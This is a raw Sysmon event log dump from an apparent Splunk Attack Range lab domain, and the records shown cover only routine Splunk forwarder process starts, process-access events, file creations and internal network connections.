Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.504{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000810760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:49.191{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57490-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74E98ACB171F6D80B038184CDAD8D925,SHA256=26E2ACFB1929FD1AFAB8CC2C51DC883F431D930532FFA1541DFF83EE93F05955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C12271B180A4BA35A56747AEED5934F,SHA256=1E6E62E9C4639856FEFD727D0A1DF3CBDDD7F76BA5BF37DAF8787C065933D5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:52.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9734EB839923DA14BCE504B6EA3700AE,SHA256=69AFCAFFC5639C0557FBEDE38162967C167FA3D03448CCE0D15FE15EC7203288,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:44.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62001-false10.0.1.12-8000- 10341000x80000000000000001055432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.686{466BC892-F8D0-60EB-0C7E-00000000CF01}90368412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3D241FB3BA648E7373B1DCFD377ACC,SHA256=F9C5CD9B3AC448BC05284900C579125AA02C68CF765CFF44ECBCDA783BBF6D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.518{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74E98ACB171F6D80B038184CDAD8D925,SHA256=26E2ACFB1929FD1AFAB8CC2C51DC883F431D930532FFA1541DFF83EE93F05955,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.382{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:53.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDA71C2D90D77B89DD8C5CA85FC6434,SHA256=0922B1E1BE77E833C44AE545F6B9CF2ADB815DA9A285A722F645D23F377C7F08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.688{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20AB3C1B72E4C1E6988DF608B7D542D8,SHA256=B3FA609B0379749BDD0E3A5ABCD0E8AC6961AEE6F2E5DC58BC78E9F1E14714D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program 